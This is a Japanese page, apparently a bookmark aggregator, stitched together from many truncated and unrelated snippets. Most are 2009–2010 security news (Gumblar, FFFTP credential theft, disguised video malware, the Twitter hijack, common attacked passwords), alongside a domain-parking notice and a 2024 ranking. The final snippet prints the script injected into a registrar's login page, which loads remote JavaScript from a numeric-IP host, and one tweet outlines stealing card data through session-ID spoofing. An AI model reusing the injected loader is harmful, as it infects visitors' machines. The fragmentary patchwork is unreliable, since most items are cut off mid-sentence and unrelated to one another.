■ 2年前に書いた懸念がいよいよ現実のものになりつつある 2008年に書いた懸念、 単純所持刑罰化ならウイルス罪を同時施行しないとセキュリティバランスが悪化する, 2008年5月5日の日記 これが現実になりつつある。 先週、長崎市立の中学校の校長が、自宅のパソコンで、児童ポルノに該当し得ると疑われるファイル名のファイルを開いたと疑われる事態が、ウイルス(トロイの木馬)によって暴露され、三流下劣メディアから嘲笑されるという事件が起きた。 中学校校長がロリコン画像を大量所持か / 性的画像と一緒に学校資料も, ロケットニュース24, 小林涼子編集長(システム担当 矢野さとる)(29日16:30修正、下記の追記2参照), 2010年3月21日 (略)この人物が校長だといわれているのはなぜか? それはロリコン画像のほかに最近使ったデータとして学校名付きで学力向上対策.jtd、学校生協への学校紹介.
適当 XSSがある=なんでもやり放題ではない ブログサービスなど自由にHTMLをかけるようなサービスでは、害が及ばないように表示を丸ごと別のドメインに分けていたり、あるいは別ドメインのIFRAME内で実行したりしているのが普通です。個人情報を預かってるサイトは、重要個人情報についてはHTTPSじゃないと参照できなかったり、そもそも表示しなかったり(パスワードやカード番号等)、決済用のパスワードや暗証番号を入れないと操作できなかったりする。 参考までに http://blog.bulknews.net/mt/archives/001274.html (2004年のアメブロ脆弱性の話) http://d.hatena.ne.jp/yamaz/20090114 (信頼できないデータを取り扱うドメインを分ける話) 管理用と別ドメインに分けたにも関わらず、script実行できることに対してDISられ
<strike>フリーFTPソフト『FFFTP』に、</strike>8080系のマルウェア感染と同時にID・パスワードを取得される危険性があるそうです 日本語対応フリーFTPソフトの草分けと言っていい、Windows用フリーソフト『FFFTP』に、マルウェア感染およびID・パスワード・ホスト先の情報を抜かれてしまう危険性がある(→追記:こちらは『FFFTP』に限定された危険ではなかったようです。改めてお詫びと訂正をいたします)と、bananaさんのブログ「smilebanana」で指摘されています。bananaさんのこの記事を紹介してくれている「UnderForge of Lack」の記事では、次のように書かれています。 FFFTPは非常に優れたフリーのFTPクライアントでした。本当に感謝いたします。 しかし、 Version 1.96d [2008/9/23]を最後に更新停止されており
This webpage was generated by the domain owner using Sedo Domain Parking. Disclaimer: Sedo maintains no relationship with third party advertisers. Reference to any specific service or trade mark is not controlled by Sedo nor does it constitute or imply its association, endorsement or recommendation.
JPCERT/CCや米US-CERT、各セキュリティソフトベンダーなどが、「Webサイトに悪意のJavaScriptが埋め込まれる攻撃が4月半ばから多発している」と警告している。 この攻撃は、活動の拠点となっているサイトのURLから「Gumblar」と名付けられている。日本のユーザーの間では、被害に遭った通販サイトの名称から「GENOウイルス」といった名称でも呼ばれている。特徴としては、感染サイトの広がりが非常に速く、英Sophosでは「これまでに最も流行した攻撃の6倍ものペースで感染サイトを増やす猛威を振るっている」と報告している。 Gumblarウイルスは、ウイルスに感染させるスクリプトがWebページに埋め込まれており、脆弱性のあるPCでそのページを閲覧した場合に感染するという、仕組みとしては最近流行しているパターンのウイルスだ。しかし、このウイルスの問題は、感染したPCのユーザーが自
京王電鉄は6日、同社の企画サイトのホームページ(HP)が不正アクセスされ、新型コンピューターウイルスの「ガンブラー」が仕掛けられたと発表した。 同社によると、不正アクセスがあったのは昨年12月16日〜1月4日。企画サイト「京王×高尾山」の閲覧者にガンブラー感染の恐れがあり、4日深夜にサイトの公開を停止した。同期間の閲覧は約1900件。同社のHPは別のサーバーで管理しており、不正アクセスはなかったという。 一方、ローソンも6日、昨年末に同社のホームページ(HP)の一部にガンブラーが仕掛けられ、何者かに不正に書き換えられていたと発表した。すでにHPは修正したが、最大450人の閲覧者に感染の恐れがあるとして、注意を呼びかけている。 同社によると、HPの採用に関するサイトが、12月28日午前11時21分〜30日午前0時20分に書き換えられていた。これまでのところ被害報告はないという。 ガン
動画ファイルに偽装したスクリーンセーバー(.scr)形式の実行ファイルで、ファイル名は「<動画タイトル名>.mp4(または.avi) <長いスペース> .scr」。アイコンも動画ファイルに偽装しているという。 ダブルクリックすると同じ名前のAVIファイルを新たに作成。動画を再生させながら、PC内のファイルをタコ、イカ、ウニ、クラゲ、サザエ、アンコウ、ナマコなどの画像で次々に上書き。システムフォルダ階層内にも複数の別ウイルスを作成し、FTP接続でデータを送信している形跡もあるという。
マイクロブログサービスTwitterが「イランのサイバー軍」と名乗るクラッカーにハッキングされ、一時アクセスできなくなっていた。現在は復旧している。 日本時間12月18日午後、Twitterにアクセスできない状態が1~2時間ほど続いた。Twitterは「DNSレコードが一時的に侵害された」と説明している。問題は既に修正したという。 Twitterはそれ以上詳しくは説明していないが、ブログメディアTechCrunchによると、ハッキングは自称「イランのサイバー軍」によるもの。このクラッカーはTwitterをハッキングしてトップページを改ざんし、「米国はアクセスによってインターネットを支配し、管理していると思っているが、そうではない。われわれが力によってインターネットを支配し、管理しているのだ」というメッセージを書き込んだという(12月19日追記:Twitterのその後の説明によると、トップペ
米Microsoftは11月27日のブログで、自動化された攻撃の標的となりやすい安易なユーザー名とパスワードのワースト10を発表した。 Microsoftはおとり用のFTPサーバを通じ、ありがちなユーザー名とパスワードの組み合わせを順番に試してパスワードを破ろうとする攻撃について情報を収集した。その結果、過去数カ月の攻撃で狙われたユーザー名は「Administrator」と「Administrateur」を筆頭に、「admin」「andrew」「dave」「steve」などの人名をそのまま使ったものが多いことが分かった。 パスワード攻撃では「password」「123456」という安易なパスワードが標的となるケースが圧倒的に多く、次いで「#!comment:」「changeme」「F**kyou(英語の悪態表現)」「abc123」などが上位を占めた。 順位 ユーザー名 攻撃回数 パスワード
December 03, 2009 avast!ご乱心、誤検知祭り! 起床してPC付けたらプーワ!プーワ!avastが警報鳴らしたので見てみると spybotに反応しやがったので、あ、これは俺のPC終わったかな?と首を… 一応2chも見てみるかとavastスレ見てみると何やら様子がおかしい! 纏めたぞ! スタートはココから 613 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/12/03(木) 09:39:30 今朝PC起動したら、あヴぁすとたんが反応しまくりで何もできない以下誤検知祭り 614 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/12/03(木) 09:40:04 shareもjaneにも反応しまくりワロタ615 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/12/03(木) 09:42:02 avastがspybotに反応してんだ
ssig33: サン牧で他人のクレカ情報取るの、セッション ID を偽装して Get するだけで、セッション ID はマイミクリスト経由で取れますよ [http://twitter.com/ssig33/statuses/5111706038] ssig33: 一応運営に連絡済、もう直ってると信じたい [http://twitter.com/ssig33/statuses/5111712163] ssig33: あとちょこちょこ SQL インジェクションが残ってたりスウィフファイルが逆コンパイル対策されてなかったり、中国人にセキュリティ対策を求めるのが酷なんじゃないかと思えるレベル [http://twitter.com/ssig33/statuses/5111734931] ssig33: 基本的なこととして、中国人がやってるサービスに個人情報を預けるべきではない、というのはこれはあると
はてなブックマークのブックマーク数が多い順に記事を紹介する「はてなブックマーク数ランキング」。12月9日(月)~12月15日(日)〔2024年12月第2週〕のトップ30です*1。 順位 タイトル 1位 無自覚にメンバーの心理的安全性を奪っていた経験から得た学び - Speaker Deck 2位 重度知的障害の女性が活躍する仕事 川崎 “あるシステム”が決め手に 職場全体にメリットも | NHK 3位 犬とおばあちゃん助けたら最近かなりいい感じ 4位 セロトニンを補う薬がびっくりするほど効く人たち | Books&Apps 5位 コワーキングスーパー銭湯ランキング(東京近郊) 6位 あるXユーザーの「娘が4~5歳の頃にハマったボドゲ」全26種の紹介ツリーが参考になる→クリスマスに子どもからボドゲを所望された親御さんは必見 - Togetter [トゥギャッター] 7位 一つ嫌なことがあると
http://anond.hatelabo.jp/20090922161446 http://twitter.com/guldeen/status/4170749637 b:id:guldeen に何があったのだろうか。 http://b.hatena.ne.jp/guldeen/20090921 この日を境に、ブクマエントリの様子がおかしい。 アカウント乗っ取りされたのだろうか? http://anond.hatelabo.jp/20090829150955 の時はネタだったようだが,今度はマジ?ネタ? http://h.hatena.ne.jp/guldeen/9259264364297917035 http://twitter.com/guldeen/status/4170749637 ひょっとして,この心配が現実のものになったんだろうか. http://jp.techcrunch.
MobsterWorldは、ユーザーはマフィアの1人となってお金を増やすゲーム。ほかのユーザーを敵として戦いを挑み、勝利すれば資金や経験値が得られる。ためた資金を使って武器を買い、攻撃力を高めたりできる。ゲームはTwitterのアカウントと連携しており、ゲーム上での行動がTwitter上でつぶやきとして発言される。 OAuthとは アカウントへのアクセス権を安全に渡せる仕組み Twitterはこの3月からOAuthを導入。ユーザーのアカウントのほぼすべての機能を、ID・パスワードを渡さずに、第三者のサービスから利用できるようにした。 アカウントへのアクセスを提供するだけなら、IDとパスワードを渡すだけでもいい。実際、TwitterのAPIを使ったサービスで、IDとパスワードを入力して利用するものは多い。 ただ、外部サービスにIDとパスワードを渡すとセキュリティ面で不安がある上、パスワードを
■ 津田大介氏の杜撰な評論 その1 Twitterを「Winny」で検索していたところ、コンテンツ学会企画の津田大介氏の講演(「コンテンツビジネスと著作権-最新動向(仮)」)があったようで、数人の人がそれをTwitter中継しているのを見かけた*1。それらの内容からすると、津田氏はWinnyに対して浅薄な理解しかしていないように見受けられたので、どういう理解をしているのだろうかと、「Winny 津田大介」でWeb検索してみたところ、今年の1月に出鱈目な著作権問題評論を展開していたのを見つけた。 津田大介:著作権っていまモーリーさんが仰ったみたいに、実は著作権ってすごくそういうときに「悪用」って言ったらおかしいけど、利用されやすいんですね。たとえば、明確に日本の法律でコンピューターウイルスを作成したのって、どういう罪に問われるんだろうって時に、結構微妙なんですよ。 モーリー:ふーん。 津田大
前の記事 最新テーザー銃で撃たれた体験レポート(動画) 人体へのハッキング攻撃:発達する「神経工学」とその危険性 2009年8月 3日 Hadley Leggett Image: University of Washington。サイトトップの画像は別の日本語版記事より これまで研究者らは、指1本動かさずに脳波だけでコンピューターを操作し、『Twitter』にメッセージを投稿したり(日本語版記事)、車椅子を動かしたり(日本語版記事)できる技術を開発してきた。だが、神経科学的な機器が複雑化・ワイヤレス化した現在、一部の専門家たちは「脳ハッキング」のリスクを真剣に考えるべきだと警鐘を鳴らしている。 ハッカーたちは四六時中パーソナル・コンピューターに侵入しているが、もし、ハッカーたちがその悪意ある熱意を、これらの医療機器に向けたら何が起こるだろう。たとえば現在パーキンソン病やうつ病の治療に使われ
SecurityFocus is the most comprehensive and trusted source of security information on the Internet. SecurityFocusは15日(カナダ時間)、IE、Chrome、Safari、Opera、Thunderbird、iPhone、Wii、PS3など広範囲に渡ってブラウザ、OS、デバイスに共通の問題があり、ブラウザの終了、OSの再起動、ハードウェアのハングアップなどの不具合が発生することを発表した(CVE-2009-1692)。同問題の影響を受けるプロダクトは次のとおり。これ以外にもJavascriptをサポートしているプロダクトで同様の問題が発生する可能性がある。 IE 5、6、7、8 (すべてのバージョン) Chrome Opera Seamonkey Midbrowser Netsc
VALUE DOMAINにウイルスコードが仕込まれる! VALUE DOMAINのHPの一部のページにウイルスが仕込まれてるようです。 ウイルスコードが仕込まれているページは、VALUE DOMAINのログイン画面です。(まだ修正されてないのでリンクは切ってます) ttps://www.value-domain.com/login.php 上記にアクセスをしたらjavascriptが読み込まれるようです。 PLAIN TEXTJavaScript: <SCRIPT LANGUAGE="JAVASCRIPT"> var js = document.createElement("script"); js.src = "http://1856317799:888/s.js"; try {document.getElementsByTagName('head')[0].appendChild(js
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く